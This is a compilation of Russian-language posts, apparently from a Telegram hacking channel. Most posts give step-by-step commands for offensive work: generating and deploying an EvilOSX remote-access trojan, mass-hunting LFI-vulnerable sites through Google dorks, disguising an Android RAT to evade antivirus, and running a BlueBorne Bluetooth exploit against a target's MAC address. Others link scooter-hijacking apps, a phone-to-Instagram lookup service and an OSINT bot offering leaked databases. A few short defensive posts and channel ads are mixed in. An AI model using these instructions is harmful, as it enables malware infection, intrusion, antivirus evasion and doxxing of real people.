​​Вирус удаленного доступа под MacOS

Из-за малого распространения устройств с MacOS создавать под неё вирусы не очень выгодно. Однако это не означает, что их нет. Придерживаться базовых правил кибербезопасности необходимо даже на такой защищенной ОС.

Касательно различий вирусов, то сложные трояны подцепить вряд ли удастся, но стандартный Remote Administration Tool(RAT) вполне возможно. Для примера, сгенерировать подобный можно с помощью эксплоита EvilOSX.

Установка

Устанавливаем Kali Linux.

Поскольку сборщик написан на Python его также нужно установить.

После чего скачиваем репозиторий

git clone https://github.com/Marten4n6/EvilOSX

Использование

Запускаем сервер в отдельном окне терминала, попутно указав ему порт

./Server.py

Запускаем билдер командой

./BUILDER EvilOSX.py

Вводим нужные настройки. Должен сгенерироваться файл, который в последующем отправляется на атакуемый ПК.

Вот и все что требуется. В окне с сервером можно узнать список зараженных вписав команду clients. Для подключения к конкретному ПК нужно вписать команду connect <номер хоста>.

#хакинг

​​Почему не стоит доверять DLL файлам?

Скачивая очередную программу с открытого ресурса можно часто наблюдать в обвес к исполняемому файлу несколько dll. На первый взгляд ничего подозрительного, просто библиотеки расширяющие функционал утилиты. При проверке в .ехе файле также нет вредоносного кода.

Но не стоит спешить с выводами. Возможность "заразить" dll файл и в последующем интегрировать в новый поток процесса определенной программы - это распространенная атака DLL Injection. Эта технология нечасто применяется в сыром виде. Обычно она служит опорой для проведения DLL Hijacking.

Её суть заключается в замене обычного DLL файла вредоносным. Для этого у последнего меняется название и выносится манифест сборки, классы, методы и т.д. Есть и более простой путь заключающийся в адаптации зловредного DLL под нормальный, только с изменением логики методов.

Во всяком случае запускайте стороннее ПО с .dll в структуре через песочницу или просто проверяйте антивирусом каждый файл.

#полезно

​​Карта кибератак

Почти каждую секунду как автоматизированные системы, так и просто ИБ-специалисты взламывают сотни серверов и устройств. Эти атаки отслеживаются, а полученная информация о них тщательно анализируется.

Обычно собранные данные засекречивают, но безобидную часть из них все же поддают огласке. На ней базируются карты кибератак. Threatmap от Check Point, Cybermap от Касперского и FireEye Cyber Threat Map - примеры подобных.

Как это работает?

Технологии у вышепредставленных примеров в большинстве разные, кто-то больше анализирует данные полученные из уведомлений собственных антивирусов, кто-то ставит ханипоты, анализ поисковых запросов также присутствует в архитектуре этих приложений.

Создать что-то подобное в домашних условиях можно установив и настроив ханипот, то есть устройство, которое имеет на борту огромное количество уязвимостей и выступает приманкой для злоумышленников.

Что можно узнать из этих карт?

Они предоставляют информацию об атаках фактически в реальном времени. Анализируя информацию с каждой, выстраивается статистика о количестве атак, наиболее атакуемых странах, индустриях и приоритетности инструментов для взлома.

#ресурсы

​Автоматизация OSINT

При проведении OSINT(разведки на основе открытых источников) для анализа безопасности определённой системы часто приходится использовать огромное количество различных ресурсов: whois лукапы, сканеры портов и т.д. Это особо неудобно при анализе большого количества систем.

Утилита Magnifier помогает справиться с подобной проблемой. Она представляет из себя сборник большого количества OSINT инструментов. В одном окне терминала можно сканировать порты, узнавать расположение сервера, читать robots.txt и многое другое.

Установка

Скачиваем репозиторий с github

git clone https://github.com/TheEyeOfCyber/Magnifier.git

Переходим в папку и ставим права исполняемому файлу

cd Magnifier

chmod +x magnifier.py

Использование

Запускаем эксплоит командой

python2 magnifier.py

Далее перед нами откроется интуитивно понятное меню. Каждая функция соответствует цифре и после выполнения не завершает сам процесс Magnifier, что позволяет получив информацию от DNS Lookup, к примеру, мгновенно переходить к сканированию портов.

 #kali #OSINT

​Где практиковаться в хакинге?

Теоретических знаний по поиску, эксплуатации и последующей защите недостаточно для становления ИБ-специалистом. Нужно где-то практиковаться и для этого дела создают уязвимые виртуальные машины, различные онлайн лаборатории и сервисы. Примером последнего является популярный некоммерческий ресурс HackThisSite.

Он предоставляет широкий спектр задач на логику, знание технологий и различных инструментов. Всего на сайте 10 тематических миссий, которые включают вебхакинг, реверс инжиниринг, задачи по программированию и т.д. В зависимости от количества решенных уровней повышается ранг пользователя.

Также у сайта есть довольно большой информационный раздел. На нем представлен блог сайта, новости, статьи, которые кстати могут создавать обычные пользователи, лекции и списки полезного софта со ссылками на проверенные источники для установки.

Одной из главных направлений развития HackThisSite в последнее время стало создание сообщества. Для этого в сервис интегрировали функцию приватных сообщений и форум. И он пользуется хорошей популярностью с количеством в 3628 статьи в общем разделе.

📌https://www.hackthissite.org

#ресурсы

​Взлом электросамоката Xiaomi

Специалисты в области кибербезопасности из компании «Zimperium», обнаружили ошибку в программном коде популярного электросамоката Xiaomi, а именно двух моделей, M365 и m365 Pro.

Из-за данной уязвимости, хакеры могут моментально разгонять или наоборот тормозить самокат без какого-либо ведома их владельца. Компания «Xiaomi» уведомлена о данной проблеме, но устранить ее нет возможности, так как используемый Bluetooth чип в электросамокате не является их разработкой.

Тем временем «умельцы» уже скомпилировали приложение, которое помогает осуществлять вышеописанные действия. Перед его запуском необходимо активировать Bluetooth и передачу GPS данных. А затем нужно выдать требуемые разрешения.

Интерфейс приложения «XiaomiMLockerM365» имеет всего 3 функциональные кнопки. Первая - это сканирование окружающих Bluetooth сигналов. Вторая клавиша, в виде замка, позволяет заблокировать электродвигатель самоката. Ну и третья, в виде черепа, позволяет выполнить неконтролируемое ускорение.

📌Исходный код для - https://github.com/chilik/Mi365Locker-iOS
📌Исходный код для Andorid - https://github.com/rani-i/Mi365Locker
📌Скачать приложение для Andorid из файлов

❗️Не применяйте эти знания против других! Это потенциально опасно!

#хакинг

​​Как купить долю в Google за пару тысяч рублей?

Пока ваш вклад пожирает инфляция, банкиры набивают карманы, инвестируя ваши деньги.

Ведь стоит только купить акции компании, пусть даже долю на 1000р, и вот, вы уже богатеете вместе с ней.

Но как и что покупать, особенно, если ничего в этом не понимаешь?

Достаточно читать Кабинет инвестора, где я простым и понятным языком рассказываю о том, как и что стоит покупать, а какие компании лучше обходить стороной.  

И никаких платных подписок, чатов, рефералок и т.д. Это бесплатно!

Вы - хозяин своих денег. Так научите их работать на вас, а не на банкиров 👉 @investingcorp

Поиск страницы Instagram по номеру телефона

Страница даже в настолько узкофункциональной социальной сети как Instagram может многое рассказать о человеке при проведении OSINT. Возможность узнать профиль Instagram по номеру телефона может помочь как обычному пользователю вычислить банально кто звонил, так и стать краеугольным камнем в получении всей необходимой личной информации злоумышленником.  

Раньше в Instagram была функция просмотра страниц пользователей находящихся в контактах. Но вскоре с целью добиться большей конфиденциальности её удалили. Однако при регистрации Instagram продолжает запрашивать доступ к телефонной книге и рекомендовать оттуда пользователей. Создатели nuga.app заметили это, построили алгоритм выявления страниц по номеру и автоматизировали его.

Использование

Перейти на сайт nuga.app

Далее нужно будет ввести номер телефона. Для поиска по зарубежному номеру необходимо просто убрать 7 и вписать нужный код страны.

При первом сканировании найденная страница предоставляется сразу, но при последующих поисках нужно будет подписаться на соцсети создателей.

Данный алгоритм поиска был представлен в открытый доступ разработчиками nuga.app и чисто теоретически может использоваться для обратного, то есть поиска номера телефона по юзернейму страницы методом подбора.

📌https://nuga.app

#OSINT

​​Что такое Сookie файлы и для чего их используют?

Сookie — это строка информации, которую веб-сайт передает в файл браузера на жестком диске компьютера, чтобы он смог запомнить пользователя. Каждый раз, когда вы открываете веб-сайт, который использует cookie файлы, он проверяет, хранится ли cookie локально на вашем компьютере. Если это так, то он может использовать его, чтобы узнать некоторую прошлую информацию о вас.

Файлы cookie подразделяются на два типа: сессионные и постоянные. Сайты обычно используют сеансовые cookie, чтобы гарантировать, что вас распознают при переходе от страницы к странице в пределах одного сайта и что вся важная информация, которую вы ввели, запоминается. Например, если сайт электроники не использует сеансовые файлы cookie, элементы, помещенные в корзину покупок, исчезнут к тому времени, когда вы перейдете к оформлению заказа.

Постоянный же файл cookie, позволяет сайту запоминать вас при последующих посещениях, ускоряя и улучшая ваш опыт или предлагаемые функции. Например, если сайт переведен на множество языков. А вы при первом посещении выберете русский язык, то сайт может записать это предпочтение в постоянном файле cookie, установленном в вашем браузере. При повторном посещении этого сайта, он будет использовать cookie, чтобы автоматически переключится на удобный язык.

Сохраняйте эту памятку и делитесь ей с друзьями, когда они будут спрашивать вас о том, что такое Cookie файлы, для чего они нужны и как происходит идентификация пользователей в сети.

#полезное

​​Поиск скрытых директорий на вебресурсе

Неправильная конфигурация сайта ведет к многочисленным уязвимостям, которые могут привести к утечке данных пользователей. Подобные проблемы часто встречаются при использовании различных CMS, особенно старых версий.

Таким образом неправильно настроенный ресурс легко поддается фаззингу. Фаззинг - это техника тестирования ПО, основной задачей которой является поиск необходимой информации путем передачи различных случайных данных.

Конкретно Wscan ищет скрытые директории и файлы, последующий анализ которых поможет злоумышленнику обнаружить уязвимости.

Установка

Устанавливаем Kali Linux.

Скачиваем репозиторий с github

◽️git clone https://github.com/Testzero-wz/wscan.git

Переходим в папку и запускаем установщик

◽️cd wscan
◽️python3 -m pip install wscan

Использование

Стандартный фаззинг Wscan запускается в одну строчку

◽️wscan -u "http://www.example.com/" -f -m

Если вписать wscan --help и прочитать справку, можно узнать что вышепредставленная команда сканирует url по словарям, проверяет ссылки и строит карту сайта.

Когда процесс завершится в логах можно будет найти админку сайта, robot.txt, различные JS скрипты и т.д. Злоумышленнику остается только тщательно проанализировать их и в случае нахождения уязвимости начать атаку.

#хакинг #kali

​​OSINT-бот, который поможет найти подробную информацию о пользователе

В данной статье, речь пойдет о многофункциональном инструменте. Который объединил в себе достаточно обширные возможности разведки, на основе открытых источников.

«HowToFind Russian Bot» — telegram проводник в сфере OSINT. Бот поможет с поиском определенных ресурсов, на которых можно осуществить запрос по имеющейся у вас информации. Бот имеет достаточно обширный круг поиска, что делает его максимально продуктивным, по сравнению с другими.

Иными словами, вы указываете на основе каких данных будет осуществляться поиск, например почта, номер авто, ник или ФИО. А бот в свою очередь, присылает ресурсы, в которых возможно будет найти дополнительную информацию.

Помимо вышеописанных возможностей, бот имеет в своем арсенале несколько подборок со слитыми базами данных, расширениями, почтовыми сервисами и поисковиками.

📌https://t.me/HowToFind_RU_bot

#OSINT #боты

​​Автоматический поиск сайтов с LFI уязвимостью

LFI - это уязвимость, которая позволяет выполнять подключение выполнение и чтение локальных файлов на сервере. Эксплуатируется она различными методами, которые в основном базируются на передаче параметров php файлу страницы.

Как и в варианте с SQL есть множество автоматизированных эксплоитов, которые по доркам Google ищут LFI уязвимые сайты. LFIFucker - один из таких. Помимо непосредственно поиска через Google CSE случайных ресурсов, есть возможность проверить свой список сайтов.

Установка и настройка

Скачиваем репозиторий командой

◽️git clone https://github.com/madRubyroid/LFIFucker.git

Далее нужно будет получить CSE-CX. Для этого нужно перейти по ссылке и добавить новую поисковую систему. В поле "Сайты, на которых выполняется поиск" нужно вписать звездочку и желаемую доменную зону, например: .ru. После сохранения, нужно перейти в Панель управления и скопировать значение из поля "Идентификатор поисковой системы".

Также нужен API-ключ для search engine. Здесь просто переходим в GCloud Console, создаем проект и включаем Custom Search API в разделе "Библиотека API". Далее переходим в "Учетные данные" и берем один из трех API ключей.

Остается только вписать эти две строчки в файл lfi.conf в корневом каталоге LFIFucker.

Использование

Для запуска сканирования по дефолтному шаблону и доркам id= и file= к примеру, нужно вписать команду

◽️./LFIFucker.sh --dork-query id=, file=

Результаты о найденных уязвимых сайтах сохранятся в директорию
tmp. Злоумышленнику останется только подобрать метод и осуществить LFI.

#хакинг

​​Новая текстовая бомба приводит к сбою WhatsApp и зависанию телефона

Участники сообщества WhatsApp сообщают о новой «текстовой бомбе», которая выводит из строя мессенджер и приводит к зависанию мобильного устройства. Проблема актуальна как для Android-платформы, так и для iOS, пишет ресурс Wabetainfo.

Опасное сообщение представляет собой бессмысленный набор символов, который не распознается WhatsApp, что приводит к сбою в работе приложения. Даже если программу открыть и закрыть, мобильное устройство зависнет и станет неработоспособным.

В настоящее время решения этой проблемы не существует, разработчики WhatsApp пока никак не прокомментировали на ситуацию. Пока пользователям рекомендуется не открывать чаты и сообщения от незнакомых номеров или контактов, а также установить опцию «My Contacts» в разделе «Who can add me to groups», что не позволит злоумышленникам добавляться в случайные группы.

​​Прокидываем трафик Telegram через TOR

С тех пор как разработчики мессенджера добавили поддержку протокола Socks5, стало возможным настроить Телеграм через Тор таким образом, чтобы весь трафик перенаправлялся через защищенную сеть. Это намного безопаснее чем использование VPN сервисов.  При помощи Тор можно обезопасить себя бесплатно и при этом обеспечить максимальную защиту конфиденциальных данных.

Чтобы перенаправить трафик через тор в телеграмме, достаточно прописать в виде прокси сервера 127.0.0.1:9150 или 127.0.0.1:9050.
Трафик будет идти через тор до того момента, пока вы не закроете его.

Для начала нужно установить ТОР или и открыть его. После этого начать проделывать действия ниже.

◽️Заходим во вкладку Настройки
◽️Далее Продвинутые настройки
◽️Тип соединения и нажимаем Использовать собственный прокси
◽️Тип прокси выбираем SOCKS5, в Хосте вводим 127.0.0.1, а во вкладке порт 9150 или 9050.
◽️Открываем ТОР

Теперь наш трафик идёт через защищенную сеть Тор. Выше указанные действия проводились на компьютере, но их можно и проделать на телефоне. Для этого вам потребуется установить мобильный клиент TOR, а именно Orbot.

​​Поиск email адресов

Для социального инженера знание email сотрудника может быть основой для атаки на определенную организацию. Поэтому следует тщательно скрывать корпоративные почты или ограничивать прием сообщений на них с помощью фильтров, т.к. фишинговое письмо с подменой адреса отправителя неподготовленному пользователю идентифицировать сложно.

Для демонстрации поиска email адресов компании воспользуемся утилитой Samurai Email Discovery. Она способна искать по названию предприятия, доркам Google и домену.

Установка

Скачиваем репозиторий

◽️git clone https://github.com/0x3curity/Samurai

Далее нужно будет установить Lynx командой

◽️apt install lynx

И поставить права на исполняемый файл

◽️chmod +x samurai.sh

Использование

Запускаем программу командой

◽️./samurai.sh

Перед нами появится меню, где можно будет выбрать тип поиска. Вводим соответствующую цифру, к примеру 3. Вводим название компании, и получаем список найденных корпоративных почт.

#OSINT #kali

​​Как обойти антивирус на Android?

Многие пренебрегают защитой операционной системы Android, в основном из-за установки необходимого ПО с PlayMarket. Однако даже в нем есть зараженные приложения. К примеру, в прошлом году компанией Trend Micro было найдено полсотни подобных.

Такой обход защиты достигается качественной маскировкой логики программы, что называется обфускацией. Подобное можно реализовать с помощью инструмента AVPass.

Установка

Устанавливаем Kali Linux.

Скачиваем репозиторий с github

git clone https://github.com/sslab-gatech/avpass

Запускаем установщик командой

./install-dep.sh

Использование

Далее нам понадобится сгенерированный билд вируса для Android. Это может быть, к примеру, RAT от AhMyth. Для базовой маскировки остается просто прописать

python gen_disguise.py -i <название файла> individual

Сгенерированный apk файл не детектится большинством антивирусов(разве что одним), а его требования к системе скрыты от пользователя при установке.

#хакинг

​​Как распознать фишинговый сайт?

Фишинг — вид интернет мошенничества, при котором злоумышленники пытаются получить конфиденциальную информацию пользователей: логин, пароль, данные банковской карты, используя точные копии официальных страниц.

Все фишинговые сайты стараются максимально отвлечь пользователя от изучения страницы и поиска признаков подделки. Они часто играют на человеческой жадности, предлагая выиграть большой денежный приз. Дополнительно, злоумышленники устанавливают таймер, чтобы пользователи поторопились с вводом персональных данных.

Мошенники всегда регистрируют похожие домены. Так например, вместо официального «facebook.com», можно увидеть «onllinfacebook.com». Также сервисы могут располагаться на поддомене «facebook.site.com», что тоже является фишинговым сайтом.

Оригинальные сайты, используют шифрование SSL для передачи данных пользователей. При использовании этой технологии безопасный адреса сайта начинается с «https://». А вот если сайт банка или авиакомпании начинается на «http://», это повод усомниться в надежности страницы.

Также, стоит обращать внимание на отсутствие пользовательских соглашений и странные контакты, различие структур страниц с оригинальным сайтом и подозрительные платежные формы, грамматические, орфографические и дизайнерские ошибки. Если сайт вызвал у вас подозрение, игнорируйте и его платежную форму.

#Полезное

​​Устройство, которое взламывает iPhone по Lightning

Как взломать iPhone? Именно такой запрос оказался одним из самых популярных в Google при одновременном использовании ключевых слов «как» и «iPhone». Понятия не имею, кому и, самое главное, зачем это нужно, но интерес к данной теме присутствует. Причём очевидно, что речь идёт вовсе не о о том, как сделать джейлбрейк, потому что под него сформировался отдельный поисковый запрос, а об обходе защитных механизмов смартфона Apple с целью выемки данных. Прибор, который способен обойти защиту Apple действительно существует и уже давно используется многими спецслужбами.

Устройство для взлома iPhone имеет название GrayKey и представляет собой небольшую коробочку 10 х 10 см, к которой одновременно можно подключить два iPhone с помощью кабелей Lightning. Время, необходимое для разблокировки, зависит от сложности установленного пользователем пароля и может составлять от нескольких часов до нескольких недель. Как только программное обеспечение GrayKey взломает код доступа, он будет отображаться прямо на экране смартфона. Затем iPhone можно подключить обратно к GrayKey, чтобы загрузить все данные, включая незашифрованное содержимое Связки ключей. К этой информации можно получить доступ с помощью компьютера.

Вообще, GrayKey на сегодня считается одним из самых распространённых инструментов взлома iPhone во всём мире. Правоохранители из разных стран заказывают его у GrayShift и совершенно не гнушаются платить колоссальные деньги за доступ к нему. Например, лицензия на взлом 300 iPhone стоит 18 тысяч долларов, а безлимитная – 30 тысяч долларов. Причём за последний год её стоимость выросла на 5%. В GrayShift объяснили это усложнением процедуры взлома из-за новых механизмов безопасности Apple.

Интересуешься взломом, хакингом и другой теневой деятельностью?

Тогда однозначно рекомендую тебе читать FCS!

Только авторские статьи с закрытых форумов, отдельное комьюнити для общения и много разных плюшек;

Действуй 👉 https://t.me/joinchat/AAAAAE3S7jMotXfNnS61Lg

​​Blueborne или отключение Bluetooth на целевом устройстве

Blueborne - это общее название восьми уязвимостей службы Bluetooth, которые могут привести к утечке данных, RCE и т.д. Переполнение буфера также относится к этому списку, и оно, в свою очередь, приводит к отказу Bluetooth на целевом устройстве.

Код данной уязвимости в базе CVE - CVE-2017-0781. Автоматизированный скрипт для её эксплуатации есть на Github, воспользуемся им для проведения тестовой атаки.

Установка и настройка

Устанавливаем Kali Linux.

Для корректной работы эксплоита необходимо установить следующие зависимости

apt-get update
apt-get install python2.7 python-pip python-dev git libssl-dev libffi-dev build-essential

Далее обновляем pwntools

pip install --upgrade pip
pip install --upgrade pwntools

Устанавливаем библиотеки для работы с Bluetooth

apt-get install bluetooth libbluetooth-dev
pip install pybluez

Скачиваем эксплоит командой

git clone https://github.com/ojasookert/CVE-2017-0781

В скачанном python файле нужно подкорректировать количество пакетов, изменив переменную count до 30000 минимум.

Использование

Сканируем эфир командой

hcitool scan

Выбираем устройство, копируем его MAC адрес и прописываем команду

python CVE-2017-0781.py TARGET=<MAC адрес>

Как итог на атакуемое устройство начнут посылаться запросы, тем самым переполняя буфер, что приведет к ошибкам и отключению службы.